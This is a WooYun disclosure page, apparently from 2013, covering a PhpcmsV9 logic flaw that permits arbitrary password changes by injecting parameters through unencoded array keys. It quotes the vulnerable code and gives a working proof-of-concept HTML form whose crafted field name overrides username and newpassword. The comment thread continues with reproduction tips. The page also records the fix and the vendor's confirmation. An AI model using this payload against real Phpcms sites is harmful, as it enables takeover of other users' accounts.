当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(38) 关注此漏洞

缺陷编号: WooYun-2013-17119

漏洞标题: PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

相关厂商: phpcms

漏洞作者: 我想拿个shell

提交时间: 2013-01-09 11:37

公开时间: 2013-02-23 11:38

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 第三方不可信程序 设计错误 逻辑错误 phpcms 任意密码修改

10人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-01-09: 细节已通知厂商并且等待厂商处理中
2013-01-09: 厂商已经确认,细节仅向厂商公开
2013-01-19: 细节向核心白帽子及相关领域专家公开
2013-01-29: 细节向普通白帽子公开
2013-02-08: 细节向实习白帽子公开
2013-02-23: 细节向公众公开

简要描述:

由于某处的实现机制没有考虑到某个条件,导致了一个任意用户密码重置漏洞。

建议漏洞危害设置为高。

详细说明:

其实我在发第一个漏洞的时候,就看到了

WooYun: PhpcmsV9 SQL注射 2013年贺岁第一发

提到的通行证的代码:



code 区域
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);





在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。



我把它留给了你们。

不知道你们发现了它没有。



我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。



所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。



也就是



username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。



要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。





其实我们有这样的机会,看看代码,如下:



code 区域
public function auth_data($data) {


		$s = $sep = '';


		foreach($data as $k => $v) {


			if(is_array($v)) {


				$s2 = $sep2 = '';


				foreach($v as $k2 => $v2) {


						$s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);


					$sep2 = '&';


				}


				$s .= $sep.$s2;


			} else {


				$s .= "$sep$k=".$this->_ps_stripslashes($v);


			}


			$sep = '&';


		}





		$auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));


		return $auth_s;


	}





可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。



举个例子



$a[aaa=a&bbb] = 'a';



会变成aaa=a&bbb=a



明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。



这个时候,我们可以再去看一个函数。



就在这个文件内:



code 区域
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {


		if($email && !$this->_is_email($email)) {


			return -4;


		}


		return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));


	}





这是向通行证发了这样一个请求。



我们再跟到通信证代码里去看看,就会有所发现。



code 区域
public function edit() {


//能省就省,太长了不是吗?





if($this->username) {


//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。


				$res = $this->db->update($data, array('username'=>$this->username));


			} else {


				file_put_contents('typeb.txt',print_r($data,1).$this->uid);


				$res = $this->db->update($data, array('uid'=>$this->uid));


			}





好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:



public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')



很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。



我当然找到了:

phpcms9/phpcms/modules/member/index.php

code 区域
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);





然后就没有然后了。



漏洞证明:

我还是给个视频说明吧。





密码:nicai



第四分钟后就别看了,我从虚拟机切出来时我电脑卡了。



此次用到的表单如下:



code 区域
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">


				<table width="100%" cellspacing="0" class="table_form">


					<tr>


						<th width="80">邮箱:</th>        


						<td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>


					</tr>


					<tr>


						<th width="80">原密码:</th>        


						<td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>


					</tr>


					<tr>


						<th>新密码:</th>


						<td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>


					</tr>


					<th></th>


					<td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>


					</tr>


				</table>





				


			</form>



修复方案:

urlencode那个key和value



话说,你看看,每次都是这么精彩的分析,这么能说明问题的漏洞,这样好的证明以及实际可用的解决方案,为啥会拿和那种无聊xss一样的rank值呢?



要有审美观。

版权声明:转载请注明来源 我想拿个shell@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-01-09 13:27

厂商回复:

感谢,请联系我们官网客服,留下你的联系方式!!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2013-01-09 11:44 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    来了 来了 又来了

    1# 回复此人
  2. 2013-01-09 11:44 | 我想拿个shell ( 实习白帽子 | Rank:70 漏洞数:5 | 好码近似诗,挫码不如屎。)
    1

    视频还是有点看不清楚,不过我给了poc代码,我只能做到这里了。

    2# 回复此人
  3. 2013-01-09 11:55 | 风萧萧 认证白帽子 ( 普通白帽子 | Rank:1068 漏洞数:80 | 人这一辈子总要动真格的爱上什么人)
    0

    1月最佳洞主?

    3# 回复此人
  4. 2013-01-09 11:57 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @风萧萧 这个最佳洞主咋选啊

    4# 回复此人
  5. 2013-01-09 12:05 | 风萧萧 认证白帽子 ( 普通白帽子 | Rank:1068 漏洞数:80 | 人这一辈子总要动真格的爱上什么人)
    0

    @xsser 管理选出最佳洞主的候选,然后所有白帽子投票。BTW,开发个投票系统撒!

    5# 回复此人
  6. 2013-01-09 12:20 | se55i0n ( 核心白帽子 | Rank:1571 漏洞数:174 )
    1

    @xsser 最佳,肯定看整体洞洞内容了撒

    6# 回复此人
  7. 2013-01-09 12:22 | 我想拿个shell ( 实习白帽子 | Rank:70 漏洞数:5 | 好码近似诗,挫码不如屎。)
    0

    @se55i0n 按照质量,我觉得我可以是个首席分析师。

    7# 回复此人
  8. 2013-01-09 12:27 | se55i0n ( 核心白帽子 | Rank:1571 漏洞数:174 )
    0

    @我想拿个shell 老实交代,你是哪个大牛的马甲...

    8# 回复此人
  9. 2013-01-09 12:36 | 冷静 ( 路人 | Rank:3 漏洞数:2 )
    0

    洞主来个dz的~

    9# 回复此人
  10. 2013-01-09 13:17 | 疯子 ( 普通白帽子 | Rank:259 漏洞数:45 | 世人笑我太疯癫,我笑世人看不穿~)
    1

    只可以说我继续关注

    10# 回复此人
  11. 2013-01-09 13:20 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1878 漏洞数:154 | 不要患得患失,我羡慕你,但是我还是选择做...)
    0

    碉堡了,来个10连发!

    11# 回复此人
  12. 2013-01-09 13:31 | 疯子 ( 普通白帽子 | Rank:259 漏洞数:45 | 世人笑我太疯癫,我笑世人看不穿~)
    1

    http://www.wooyun.org/whitehats/tenzy 严重怀疑马甲是这个!

    12# 回复此人
  13. 2013-01-09 13:33 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)
    0

    洞主威武!

    13# 回复此人
  14. 2013-01-09 13:57 | 我想拿个shell ( 实习白帽子 | Rank:70 漏洞数:5 | 好码近似诗,挫码不如屎。)
    0

    @疯子 还真不是。

    14# 回复此人
  15. 2013-01-29 23:57 | hacx ( 实习白帽子 | Rank:52 漏洞数:6 )
    1

    视频看不清啊。。。

    15# 回复此人
  16. 2013-01-30 09:43 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)
    0

    这个还真精彩...

    16# 回复此人
  17. 2013-01-30 18:07 | Seay ( 实习白帽子 | Rank:65 漏洞数:8 )
    0

    分析的很不错,支持洞主

    17# 回复此人
  18. 2013-01-30 18:24 | _Evil ( 普通白帽子 | Rank:431 漏洞数:61 | 万事无他,唯手熟尔。农民也会编程,别指望天...)
    0

    @我想拿个shell <th>新密码:</th> <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td> </tr> 中的%5D=aaa%5D%5B有什么作用

    18# 回复此人
  19. 2013-01-30 18:26 | _Evil ( 普通白帽子 | Rank:431 漏洞数:61 | 万事无他,唯手熟尔。农民也会编程,别指望天...)
    0

    @风萧萧 @疯子 @hacx @xsser @疯狗 <th>新密码:</th> <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td> </tr> 中的%5D=aaa%5D%5B有什么作用

    19# 回复此人
  20. 2013-01-30 18:28 | Ray ( 实习白帽子 | Rank:75 漏洞数:7 )
    0

    @_Evil 没用。

    20# 回复此人
  21. 2013-01-30 18:30 | 我想拿个shell ( 实习白帽子 | Rank:70 漏洞数:5 | 好码近似诗,挫码不如屎。)
    1

    @Ray @_Evil 对 确实是没有用,这个是在测试的时候没有删,实际上后来看代码,value也没有urlencode的。

    21# 回复此人
  22. 2013-01-30 21:53 | Seay ( 实习白帽子 | Rank:65 漏洞数:8 )
    1

    厂商回复:感谢,请联系我们官网客服,留下你的联系方式!!

    22# 回复此人
  23. 2013-01-30 21:57 | _Evil ( 普通白帽子 | Rank:431 漏洞数:61 | 万事无他,唯手熟尔。农民也会编程,别指望天...)
    0

    @我想拿个shell value利用表单怎么写呢。 感谢分享

    23# 回复此人
  24. 2013-01-31 10:53 | 我想拿个shell ( 实习白帽子 | Rank:70 漏洞数:5 | 好码近似诗,挫码不如屎。)
    0

    @_Evil value就不需要修改表单了,直接在对应的参数写a&b&c就可以了。

    24# 回复此人
  25. 2013-02-23 15:22 | 酷帥王子 ( 普通白帽子 | Rank:262 漏洞数:71 | 天之屌,人之神!天人合一,乃屌神也!绝对...)
    0

    这神马漏洞呢,要知道原密码,改密码直接可以在后台改呀

    25# 回复此人
  26. 2013-02-23 16:34 | 酷帥王子 ( 普通白帽子 | Rank:262 漏洞数:71 | 天之屌,人之神!天人合一,乃屌神也!绝对...)
    0

    为什么我测试以后老是提示原密码不正确呢

    26# 回复此人
  27. 2013-11-20 12:01 | 士大夫 ( 实习白帽子 | Rank:88 漏洞数:37 | 杭州WEB安全小组)
    0

    测试的时候提示老是提示原始密码错误。是怎么回事啊。原始密码填的是当前登录密码吗?

    27# 回复此人

登录后才能发表评论,请先 登录